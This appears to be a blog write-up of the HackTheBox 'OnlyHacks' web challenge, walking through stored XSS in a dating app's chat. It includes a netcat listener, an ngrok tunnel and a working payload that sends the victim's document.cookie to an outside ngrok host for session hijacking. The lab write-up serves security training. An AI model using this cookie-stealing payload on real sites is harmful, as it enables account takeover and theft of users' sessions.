Skip to main content
Policy to Packets
Policy to Packets
  1. Policy to Packets/
  2. Writeups/
  3. HackTheBox/
  4. Challenges/

(Writeup) HackTheBox Labs - Challenge - OnlyHacks

HackTheBox Challenge Very_Easy Writeup XSS
Table of Contents

Welcome! (Happy Valentine’s Day!)
#

  • HackTheBox is an offensive cybersecurity-focused platform.
  • This is a writeup for one of their challenges.

Scenario:
#

Dating and matching can be exciting especially during Valentine’s, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?

Release Date: Feb, 14th 2025.

Start:
#

This challenge has no files; looks like it’s only an IP and Port given to us.

The challenge is very easy, and the description and name stand out like a web app. Just gonna check it out in the browser.

Pfttttt- okay. Well, the login doesn’t do anything with dummy information. Let’s register.

Register page:

Guess I’ll register a profile to see what I see.

Looking around, there is this dashboard page and a chat page.

Oh, should check out cookies as well.

No Http Only flag on the cookie? Oh, is that the target? XSS, get session cookie, get flag?

XSS
#

I “swiped right” on everyone on the main page and got a message. Testing:

hello!<script>alert(1);</script>

Yep, XSS. Now let’s grab their cookie… (if there is one…)

Shout out hacktricks.

Real quick, since this is a challenge box, we need a publicly accessible IP : Port to get the data…

Time to spin up ngrok.

Now we’ll set up 2 terminals. One to listen, and the second to run ngrok.

nc -lvnp 4444
ngrok http 4444

Now, let’s alter that script and send it over. We’ll just paste the forwarding address from ngrok into the XSS script. In my case:

Sorry. <img src=x onerror=this.src="http://e4c1-85-9-195-5.ngrok-free.app/?c="+document.cookie>

It worked! (Also caused a ton of connections over and over… so I CTRL-C’d ngrok.) Let’s alter our session key and see what we get.

(Remember to click save if using the same Firefox extension!)

Hope that helps! :)

Reed Eggleston
Author
Reed Eggleston
B.S. in Cybersecurity | SSCP | CySA+ | PenTest+ | Project+